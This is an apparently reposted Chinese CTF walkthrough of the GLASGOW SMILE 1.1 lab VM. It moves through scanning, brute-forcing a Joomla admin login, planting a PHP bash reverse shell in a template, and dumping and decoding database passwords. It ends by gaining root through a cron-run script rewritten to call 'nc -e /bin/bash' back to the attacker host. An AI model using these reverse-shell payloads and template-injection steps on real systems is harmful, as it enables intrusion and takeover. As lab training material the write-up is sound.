红队打靶练习:GLASGOW SMILE: 1.1

news2024/11/13 23:34:15

目录

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

目录探测

1、gobuster

2、dirsearch

WEB

web信息收集

/how_to.txt

/joomla

CMS利用

1、爆破后台

2、登录

3、反弹shell

提权

系统信息收集

rob用户登录

abner用户

penguin用户

get root flag

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:20:80:1b, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:f0:c5:cd       VMware, Inc.
192.168.16.130  00:50:56:22:5c:6c       VMware, Inc.
192.168.16.254  00:50:56:ee:5e:d8       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.529 seconds (101.23 hosts/sec). 4 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.16.130 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 09:35 CST
Nmap scan report for 192.168.16.130
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:50:56:22:5C:6C (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.85 seconds

信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -p 22,80 192.168.16.130 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-08 09:36 CST
Nmap scan report for 192.168.16.130
Host is up (0.00034s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 67:34:48:1f:25:0e:d7:b3:ea:bb:36:11:22:60:8f:a1 (RSA)
|   256 4c:8c:45:65:a4:84:e8:b1:50:77:77:a9:3a:96:06:31 (ECDSA)
|_  256 09:e9:94:23:60:97:f7:20:cc:ee:d6:c1:9b:da:18:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:50:56:22:5C:6C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.51 seconds


我们发现靶机就开放了22和80端口!

22端口是 OpenSSH 7.9p1  80端口是http    Apache httpd 2.4.38  

根据信息回显,发现此系统是linux!

3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.16.130
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.16.130
+ Target Hostname:    192.168.16.130
+ Target Port:        80
+ Start Time:         2024-02-08 09:41:25 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 7d, size: 5a7fbb701d4b6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-02-08 09:41:50 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb http://192.168.16.130
http://192.168.16.130 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.16.130]

目录探测

1、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.16.130/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.130/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 125]
/joomla               (Status: 301) [Size: 317] [--> http://192.168.16.130/joomla/]
/how_to.txt           (Status: 200) [Size: 456]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 882244 / 882248 (100.00%)
===============================================================
Finished
===============================================================

2、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.16.130 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.16.130/_24-02-08_09-45-15.txt

Target: http://192.168.16.130/

[09:45:15] Starting:
[09:45:51] 301 -  317B  - /joomla  ->  http://192.168.16.130/joomla/
[09:45:51] 301 -  331B  - /joomla/administrator  ->  http://192.168.16.130/joomla/administrator/
[09:45:59] 200 -    3KB - /joomla/

Task Completed

joomla?? 

WEB

web信息收集


主页就是个小丑图片!没有可疑点!

/how_to.txt


/joomla
Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网;
通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。
其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可,任何人随时都能下载 Joomla! 并立即使用它。



使用 JoomlaScan 工具也没有什么收获!根据靶机提示,枚举爆破可能有用!我们只能尝试爆破joomla!的登录后台账号以及密码了!


CMS利用

1、爆破后台
┌──(root㉿ru)-[~/kali]
└─# cat user
joomla
joomla!
Joomla
Joomla!
admin
root


利用cewl命令去网页抓取点字符串当密码!


抓取登陆包!




记得都把url编码去掉!


用户名:joomla   密码:Gotham

2、登录


登录成功!

在joomla中,我们可以利用模板文件写入shell的方式获取到shell!



选择第二个!


我们在index 文件写入反弹shell木马!

3、反弹shell
payload

bash -c '/bin/bash -i >&/dev/tcp/192.168.16.128/1234 0>&1‘

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.16.128/1234 0>&1'"); ?>


在kali进行监听!然后访问index即可!



提权

系统信息收集
可以使用python提高交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'



数据库  

joomla  :  babyjoker


www-data@glasgowsmile:/var/www/html/joomla$ mysql -u joomla -p
mysql -u joomla -p
Enter password: babyjoker

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 4454
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

经过我的摸索,在batjoke库,taskforce表中可以得到一些账号密码!

MariaDB [batjoke]> select * from taskforce;
select * from taskforce;
+----+---------+------------+---------+----------------------------------------------+
| id | type    | date       | name    | pswd                                         |
+----+---------+------------+---------+----------------------------------------------+
|  1 | Soldier | 2020-06-14 | Bane    | YmFuZWlzaGVyZQ==                             |
|  2 | Soldier | 2020-06-14 | Aaron   | YWFyb25pc2hlcmU=                             |
|  3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ==                         |
|  4 | Soldier | 2020-06-14 | buster  | YnVzdGVyaXNoZXJlZmY=                         |
|  6 | Soldier | 2020-06-14 | rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
|  7 | Soldier | 2020-06-14 | aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |
+----+---------+------------+---------+----------------------------------------------+
6 rows in set (0.001 sec)    


Bane :baneishere
Aaron :aaronishere
Carnage :carnageishere
buster :busterishereff
rob :???AllIHaveAreNegativeThoughts???
aunt : auntis the fuck here

rob用户的密码很特殊!我们尝试使用ssh登录!因为靶机还开放一个22端口!

rob用户登录
rob :???AllIHaveAreNegativeThoughts???

┌──(root㉿ru)-[~/kali]
└─# ssh rob@192.168.16.130
The authenticity of host '192.168.16.130 (192.168.16.130)' can't be established.
ED25519 key fingerprint is SHA256:bVGopxZOACv+Dy/jm+EmAyAQm+YSDTmVK1pVrNUz+P8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.16.130' (ED25519) to the list of known hosts.
rob@192.168.16.130's password:
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 16 13:24:25 2020 from 192.168.10.172
rob@glasgowsmile:~$


拿到user.txt文件!

rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==


我们发现文本都被移位了!我们就使用rot13移位1进行复原!

翻译:

你好,亲爱的,亚瑟患有严重的精神疾病,但我们对他的病情没有多少同情。这与他被忽视的感觉有关。你可以在他的日记中找到一条写道:“患有精神疾病最糟糕的部分是人们希望你表现得好像你没有。”
现在我需要你的帮助阿布纳,使用这个密码,你会找到正确的方法来解决这个谜。


──(root㉿ru)-[~/kali]
└─# echo "STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==" | base64 -d
I33hope99my0death000makes44more8cents00than0my0life0

这里需要进行横向渗透,经过尝试,这个密码是abner用户的!

abner用户
rob@glasgowsmile:/home$ ls
abner  penguin  rob
rob@glasgowsmile:/home$ su abner
Password:
abner@glasgowsmile:/home$


abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}

得到第二个flag

abner@glasgowsmile:~$ cat info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").

译:

格拉斯哥微笑是一种从受害者的嘴角到耳朵的伤口,留下微笑形状的疤痕。
这种行为通常是用一把美工刀或一块碎玻璃进行的,留下的疤痕会让受害者看起来笑容满面。
据说这种做法起源于20世纪二三十年代的苏格兰格拉斯哥。这次袭击在英国街头帮派中很受欢迎(尤其是在总部位于伦敦的流氓公司切尔西猎头公司中,这被称为“切尔西咧嘴笑”或“切尔西微笑”)。


???

abner@glasgowsmile:~$ cat .bash_history
whoami
systemctl reboot
fuck
su penguin
mysql -u root -p
exit
cd .bash/
ls
unzip .dear_penguins.zip
cat dear_penguins
rm dear_penguins
exit
ls
cd /home/abner/
ls
exit

?? 发现有历史命令!  .dear_penguins.zip这个文件似乎很重要!我们去寻找一下!

abner@glasgowsmile:~$ find / -name ".dear_penguins.zip" -type f 2>/dev/null
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip


abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ ls -al
total 16
drwxr-xr-x 2 root  root  4096 Jun 16  2020 .
drwxr-xr-x 5 root  root  4096 Jun 16  2020 ..
-rwxr-xr-x 1 abner abner  516 Jun 16  2020 .dear_penguins.zip
-rwxr-xr-x 1 root  root  1796 Jun 16  2020 joomla.xml
abner@glasgowsmile:/var/www/joomla2/administrator/manifests/files$ unzip .dear_penguins.zip -d /tmp
Archive:  .dear_penguins.zip
[.dear_penguins.zip] dear_penguins password:
  inflating: /tmp/dear_penguins

我们将其解压到/tmp目录下!

abner@glasgowsmile:/tmp$ cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

???还来??

译:

亲爱的企鹅们,我们站在一个巨大的门槛上!害怕是可以的;你们中的许多人不会回来了。多亏了蝙蝠侠,现在是惩罚上帝所有孩子的时候了!第一个、第二个、第三个和第四个出生!为什么有偏见?!男性和女性!见鬼,性别是平等的,他们的性感区域被吹得天高!!!前进!!!哥谭的解放已经开始了!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

这个是最后一个用户的密码!我们不需要进行编码解码!我已经试过了!

penguin用户
abner@glasgowsmile:/home$ su penguin
Password:
penguin@glasgowsmile:/home$ id
uid=1002(penguin) gid=1002(penguin) groups=1002(penguin)
penguin@glasgowsmile:/home$


拿到第三个flag!


penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat PeopleAreStartingToNotice.txt
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.

Joker

  _____    _____      __      _   __   ________       _____   ________      ______     _____     ____     __    __   ________    _____   _________   __    __   _____       ______
 (_   _)  / ____\    /  \    / ) (  ) (___  ___)     (_   _) (___  ___)    (_   _ \   / ___/    (    )    ) )  ( (  (___  ___)  (_   _) (_   _____)  ) )  ( (  (_   _)     (_____ \
   | |   ( (___     / /\ \  / /   \/      ) )          | |       ) )         ) (_) ) ( (__      / /\ \   ( (    ) )     ) )       | |     ) (___    ( (    ) )   | |          ___) )
   | |    \___ \    ) ) ) ) ) )          ( (           | |      ( (          \   _/   ) __)    ( (__) )   ) )  ( (     ( (        | |    (   ___)    ) )  ( (    | |         (  __/
   | |        ) )  ( ( ( ( ( (            ) )          | |       ) )         /  _ \  ( (        )    (   ( (    ) )     ) )       | |     ) (       ( (    ) )   | |   __     )_)
  _| |__  ___/ /   / /  \ \/ /           ( (          _| |__    ( (         _) (_) )  \ \___   /  /\  \   ) \__/ (     ( (       _| |__  (   )       ) \__/ (  __| |___) )    __
 /_____( /____/   (_/    \__/            /__\        /_____(    /__\       (______/    \____\ /__(  )__\  \______/     /__\     /_____(   \_/        \______/  \________/    (__)

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old
#/bin/sh

#       (            (              )            (      *    (   (
# (      )\ )   (     )\ ) (      ( /( (  (       )\ ) (  `   )\ ))\ )
# )\ )  (()/(   )\   (()/( )\ )   )\()))\))(   ' (()/( )\))( (()/(()/( (
#(()/(   /(_)((((_)(  /(_)(()/(  ((_)\((_)()\ )   /(_)((_)()\ /(_)/(_)))\
# /(_))_(_))  )\ _ )\(_))  /(_))_  ((__(())\_)() (_)) (_()((_(_))(_)) ((_)
#(_)) __| |   (_)_\(_/ __|(_)) __|/ _ \ \((_)/ / / __||  \/  |_ _| |  | __|
#  | (_ | |__  / _ \ \__ \  | (_ | (_) \ \/\/ /  \__ \| |\/| || || |__| _|
#   \___|____|/_/ \_\|___/   \___|\___/ \_/\_/   |___/|_|  |_|___|____|___|
#

#


exit 0


.trash_old这个文件是以root权限运行的!

找了半天也没有可以利用的!但是这里有个脚本就很奇怪!计划任务里面也没有!我们只能用pspy工具进行查看隐藏进程!

在本地开启虚拟服务器!在靶机内下载!



果然又隐藏进程!计划任务在执行这个!我们去修改脚本!

penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat .trash_old

#!/bin/sh

#       (            (              )            (      *    (   (
# (      )\ )   (     )\ ) (      ( /( (  (       )\ ) (  `   )\ ))\ )
# )\ )  (()/(   )\   (()/( )\ )   )\()))\))(   ' (()/( )\))( (()/(()/( (
#(()/(   /(_)((((_)(  /(_)(()/(  ((_)\((_)()\ )   /(_)((_)()\ /(_)/(_)))\
# /(_))_(_))  )\ _ )\(_))  /(_))_  ((__(())\_)() (_)) (_()((_(_))(_)) ((_)
#(_)) __| |   (_)_\(_/ __|(_)) __|/ _ \ \((_)/ / / __||  \/  |_ _| |  | __|
#  | (_ | |__  / _ \ \__ \  | (_ | (_) \ \/\/ /  \__ \| |\/| || || |__| _|
#   \___|____|/_/ \_\|___/   \___|\___/ \_/\_/   |___/|_|  |_|___|____|___|
#

#

nc -e /bin/bash 192.168.16.128 1111

#exit 0


get root flag
cd /root
ls
root.txt
whoami
cat root.txt
  ▄████ ██▓   ▄▄▄       ██████  ▄████ ▒█████  █     █░     ██████ ███▄ ▄███▓██▓██▓   ▓█████
 ██▒ ▀█▓██▒  ▒████▄   ▒██    ▒ ██▒ ▀█▒██▒  ██▓█░ █ ░█░   ▒██    ▒▓██▒▀█▀ ██▓██▓██▒   ▓█   ▀
▒██░▄▄▄▒██░  ▒██  ▀█▄ ░ ▓██▄  ▒██░▄▄▄▒██░  ██▒█░ █ ░█    ░ ▓██▄  ▓██    ▓██▒██▒██░   ▒███
░▓█  ██▒██░  ░██▄▄▄▄██  ▒   ██░▓█  ██▒██   ██░█░ █ ░█      ▒   ██▒██    ▒██░██▒██░   ▒▓█  ▄
░▒▓███▀░██████▓█   ▓██▒██████▒░▒▓███▀░ ████▓▒░░██▒██▓    ▒██████▒▒██▒   ░██░██░██████░▒████▒
 ░▒   ▒░ ▒░▓  ▒▒   ▓▒█▒ ▒▓▒ ▒ ░░▒   ▒░ ▒░▒░▒░░ ▓░▒ ▒     ▒ ▒▓▒ ▒ ░ ▒░   ░  ░▓ ░ ▒░▓  ░░ ▒░ ░
  ░   ░░ ░ ▒  ░▒   ▒▒ ░ ░▒  ░ ░ ░   ░  ░ ▒ ▒░  ▒ ░ ░     ░ ░▒  ░ ░  ░      ░▒ ░ ░ ▒  ░░ ░  ░
░ ░   ░  ░ ░   ░   ▒  ░  ░  ░ ░ ░   ░░ ░ ░ ▒   ░   ░     ░  ░  ░ ░      ░   ▒ ░ ░ ░     ░
      ░    ░  ░    ░  ░     ░       ░    ░ ░     ░             ░        ░   ░     ░  ░  ░  ░



Congratulations!

You've got the Glasgow Smile!

JKR{68028b11a1b7d56c521a90fc18252995}


Credits by

mindsflee

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1440905.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数码管扫描显示-单片机通用模板

数码管扫描显示-单片机通用模板 一、数码管扫描的原理二、display.c的实现1、void Display(void) 各模式界面定义数据2、void BackupRamToDisRam(void)从缓存区刷新显示映射Ram3、void FreshDisplay(void) 映射显示Ram到主控的IO口4、void LcdDisplay_8bit(void) 映射显示Ram到…

供应链|Managemeng Science 论文解读:数据驱动下联合定价和库存控制的近似方法 (一)

编者按 本次解读的文章发表于 Management Science&#xff0c;原文信息&#xff1a;Hanzhang Qin, David Simchi-Levi, Li Wang (2022) Data-Driven Approximation Schemes for Joint Pricing and Inventory Control Models. https://doi.org/10.1287/mnsc.2021.4212 文章在数…

通过Demo学WPF—数据绑定(二)

准备 今天学习的Demo是Data Binding中的Linq&#xff1a; 创建一个空白解决方案&#xff0c;然后添加现有项目&#xff0c;选择Linq&#xff0c;解决方案如下所示&#xff1a; 查看这个Demo的效果&#xff1a; 开始学习这个Demo xaml部分 查看MainWindow.xaml&#xff1a; …

【RT-DETR进阶实战】利用RT-DETR进行过线统计(可用于人 、车过线统计)

&#x1f451;欢迎大家订阅本专栏&#xff0c;一起学习RT-DETR&#x1f451; 一、本文介绍 Hello&#xff0c;各位读者&#xff0c;最近会给大家发一些进阶实战的讲解&#xff0c;如何利用RT-DETR现有的一些功能进行一些实战&#xff0c; 让我们不仅会改进RT-DETR&#xf…

C++ lambda [],[=] ,[],[this] 的使用

在c11标准中引入了lambda表达式&#xff0c;一般用于定义匿名函数 [],[] ,[&],[this] 都是捕获列表 [] 的作用&#xff1a; 什么也不捕获 [] 的作用&#xff1a; 按值捕获所有变量 [&] 的作用&#xff1a; 引用捕获所有外部作用域内的变量 [this]的作用&#xf…

【Boost】:http_server模块(六)

http_server模块 一.安装cpp-httplib库二.基本使用服务器 一.安装cpp-httplib库 可以自己写一个http服务器&#xff0c;但比较麻烦&#xff0c;这里直接使用库。 在gitee上搜索cpp-httplib&#xff0c;任意找一个即可&#xff08;建议使用0.7.15版本&#xff09;。例如&#xf…

网络编程-Socket套接字

目录 1.网络编程 1.1定义与图解 1.2基本概念 &#xff08;1&#xff09;发送端和接收端 &#xff08;2&#xff09;请求和响应 &#xff08;3&#xff09;客户端和服务端 2.Socket套接字 2.1定义 2.2分类 &#xff08;1&#xff09;流套接字 &#xff08;2&#xff…

实例分割论文阅读之:FCN:《Fully Convolutional Networks for Semantica Segmentation》

论文地址:https://openaccess.thecvf.com/content_cvpr_2015/papers/Long_Fully_Convolutional_Networks_2015_CVPR_paper.pdf 代码链接&#xff1a;https://github.com/pytorch/vision 摘要 卷积网络是强大的视觉模型&#xff0c;可以产生特征层次结构。我们证明&#xff0c…

第62讲商品搜索动态实现以及性能优化

商品搜索后端动态获取数据 后端动态获取数据&#xff1a; /*** 商品搜索* param q* return*/GetMapping("/search")public R search(String q){List<Product> productList productService.list(new QueryWrapper<Product>().like("name", q)…

机器学习系列——(十七)聚类

引言 在当今数据驱动的时代&#xff0c;机器学习已经成为了解锁数据潜能的关键技术之一。其中&#xff0c;聚类作为机器学习领域的一个重要分支&#xff0c;广泛应用于数据挖掘、模式识别、图像分析等多个领域。本文旨在深入探讨聚类技术的原理、类型及其应用&#xff0c;为读…

Maven私服部署与JAR文件本地安装

Nexus3 是一个仓库管理器&#xff0c;它极大地简化了本地内部仓库的维护和外部仓库的访问。 平常我们在获取 maven 仓库资源的时候&#xff0c;都是从 maven 的官方&#xff08;或者国内的镜像&#xff09;获取。团队的多人员同样的依赖都要从远程获取一遍&#xff0c;从网络方…

K8S之运用亲和性设置Pod的调度约束

亲和性 Node节点亲和性硬亲和实践软亲和性实践 Pod节点亲和性和反亲和性pod亲和性硬亲和实践 pod反亲和性 Pod 的yaml文件里 spec 字段中包含一个 affinity 字段&#xff0c;使用一组亲和性调度规则&#xff0c;指定pod的调度约束。 kubectl explain pods.spec.affinity 配置…

对称二叉树

给你一个二叉树的根节点 root &#xff0c; 检查它是否轴对称。 示例 1&#xff1a; 输入&#xff1a;root [1,2,2,3,4,4,3] 输出&#xff1a;true示例 2&#xff1a; 输入&#xff1a;root [1,2,2,null,3,null,3] 输出&#xff1a;false思路&#xff1a;1.确定递归函数的参数…

Token、Tokenization 和张量之间的关系

输入经过Tokenization、Embedding和Positional Encoding后&#xff0c;最终构建为张量&#xff0c;给后续的计算和处理带来很多优势。 1. tokenization和张量 在自然语言处理&#xff08;NLP&#xff09;领域中&#xff0c;tokenization 是文本预处理的重要步骤之一&#xff0…

91.网游逆向分析与插件开发-游戏窗口化助手-游戏窗口化助手的UI设计

内容参考于&#xff1a;易道云信息技术研究院VIP课 上一个内容&#xff1a;项目需求与需求拆解-CSDN博客 码云地址&#xff08;游戏窗口化助手 分支&#xff09;&#xff1a;https://gitee.com/dye_your_fingers/sro_-ex.git 码云版本号&#xff1a;e512d44da1b7e6a8726b1be0…

Rust 格式化输出

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言一、format! 宏二、fmt::Debug三、fmt::Display四、? 操作符 循环打印 前言 Rust学习系列-本文根据教程学习Rust的格式化输出&#xff0c;包括fmt::Debug&…

【C++】结构体变量的赋值细节

C中 结构体变量的赋值与数组在定义时的初始化(赋值)十分相似&#xff1a; ①它们定义在全局区时都会自动初始化为0 ②都是使用大括号的方式赋值 ③大括号中的值都是从前往后一一对应的进行赋值&#xff0c;如果大括号中的值的数量不够的话&#xff0c;后面那些没有被手动赋值的…

ubuntu20.04安装最新版nginx

前言 记录下ubuntu服务器安装nginx 步骤 安装最新版本的 Nginx 可以通过添加 Nginx 官方的软件仓库并更新软件包信息。以下是在 Ubuntu 20.04 上安装最新版本 Nginx 的步骤&#xff1a; 添加 Nginx 软件仓库&#xff1a; 打开终端并执行以下命令&#xff1a; sudo sh -c echo…

无人机动力系统高倍率锂聚合物电池介绍,无人机锂电池使用与保养,无人机飞行控制动力源详解

无人机电池使用及保养 电池是无人机飞行的动力来源,也是一个消耗品&#xff0c;对电池充分了解&#xff0c;采取正确的使用方法&#xff0c;妥善进行维护保养将有助于提高飞行的安全性、延长电池的使用寿命。以下将详细对电池的使用和管理进行讲解。 高倍率锂聚合物电池的含义…

HiveSQL——条件判断语句嵌套windows子句的应用

注&#xff1a;参考文章&#xff1a; SQL条件判断语句嵌套window子句的应用【易错点】--HiveSql面试题25_sql剁成嵌套判断-CSDN博客文章浏览阅读920次&#xff0c;点赞4次&#xff0c;收藏4次。0 需求分析需求&#xff1a;表如下user_idgood_namegoods_typerk1hadoop1011hive1…